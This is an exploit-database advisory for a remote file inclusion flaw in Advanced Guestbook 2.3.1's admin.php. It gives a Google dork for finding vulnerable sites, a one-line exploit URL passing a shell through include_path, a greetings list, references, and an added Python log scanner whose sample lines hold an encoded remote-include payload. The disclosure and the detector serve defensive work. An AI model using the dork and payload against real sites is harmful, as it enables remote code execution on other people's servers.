Advanced Guestbook 2.3.1 (Admin.php) Remote File Include

2006-11-09 / 2012-03-12
Credit: BrokeN-ProXy
Risk: High
Local: No
Remote: Yes
CWE: CWE-98


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%#
Advanced Guestbook 2.3.1 (Admin.php) Remote File Include
#%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%#
Author: BrokeN-ProXy
Script : admin.php
Found : www.hotscripts.com
Risk : Dangerous
Dork : "powered by: Advanced Guestbook 2.3.1"
#%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%#
Exploit:
www.Site.com/[AGuest Path]/admin.php?include_path=Shell?cmd
Notice: [AGuest Path] may be more than one; you are advised to use the direct result of search.
#%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%#
GreestZ: nEt^DeViL[ My Best friend ] .:. RoDhEDoR .:. Linux_Drox .:. A-S-T [ Dr-Hacker ] .:. SnIpEr_SA .:. Eddy_BAck0o .:. Red Devils Crew[ |Màstr ] .:. PROHacker .:. Devil-00 .:. Red_Casper .:. ReMoTeR .:. Le CoPrA .:. Mor0ccan Islam Defenders Team .:. Mr.Elgaarh .:. Team-Evil [ X-BLooD-X ] .:. MosT3mR .:. CracK_Man .:. b0rizQ .:. ThXGhost .:. 0sama_11_9 .:. nEt^vIrUS .:. -=MIZO=-
And All Users in: www.3asfh.net/vb/ www.lezr.com/vb/
broken-proxy[at]Linuxmail[dot]org

References:

http://www.vupen.com/english/advisories/2006/4385
http://www.securityfocus.com/bid/20902
http://www.securityfocus.com/archive/1/archive/1/450729/100/0/threaded
http://secunia.com/advisories/22756
http://www.osvdb.org/30230
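
Detection sketch for the request shape in the advisory (admin.php called with an include_path parameter), as an added example that is not part of the original advisory or of Advanced Guestbook. It assumes Common/Combined Log Format access logs and that legitimate clients never supply include_path themselves; the log lines, hosts and addresses are constructed, and values sent via POST body or cookie are not visible to it.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Common/Combined Log Format: client ... "METHOD URI PROTO" status
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<uri>\S+) [^"]*" (?P<status>\d{3})')
# A value starting with a scheme or stream wrapper (http:, ftp:, php:, data:),
# "//host" or a UNC prefix points the include at content outside the web root.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*:|//|\\\\)', re.I)

def classify(line):
    """Return a finding dict if the request sets include_path on admin.php, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["uri"])
    if not parts.path.lower().endswith("/admin.php"):
        return None
    query = parse_qs(parts.query, keep_blank_values=True)
    # PHP also accepts the array form include_path[]=..., so match on the base name.
    values = [v for k, vs in query.items() if k.split("[")[0] == "include_path" for v in vs]
    if not values:
        return None
    # parse_qs decodes once; decode again so double URL-encoding cannot hide a scheme.
    decoded = [unquote(v) for v in values]
    remote = any(REMOTE_RE.match(v) for v in decoded)
    return {"ip": m["ip"], "status": int(m["status"]), "value": decoded[0],
            "severity": "high" if remote else "medium"}

def scan(lines):
    """Classify every log line and keep only the findings."""
    return [f for f in map(classify, lines) if f]

# Constructed sample access-log lines (documentation addresses and hosts only).
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Nov/2006:10:00:00 +0000] "GET /guestbook/admin.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [09/Nov/2006:10:01:12 +0000] "GET /guestbook/admin.php?include_path=http://files.example.net/x.txt? HTTP/1.1" 200 312',
    '198.51.100.7 - - [09/Nov/2006:10:01:40 +0000] "GET /gb/admin.php?include_path=%2568ttp%253A%252F%252Ffiles.example.net%252Fx HTTP/1.1" 404 0',
    '192.0.2.44 - - [09/Nov/2006:10:02:03 +0000] "GET /guestbook/admin.php?include_path=./lib HTTP/1.1" 200 5120',
    '192.0.2.10 - - [09/Nov/2006:10:03:00 +0000] "GET /guestbook/index.php?entry=5 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A "medium" finding means the parameter was supplied with a local-looking value, which is still worth review because the script is not expected to receive it from clients under the stated assumption.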


Copyright 2024, cxsecurity.com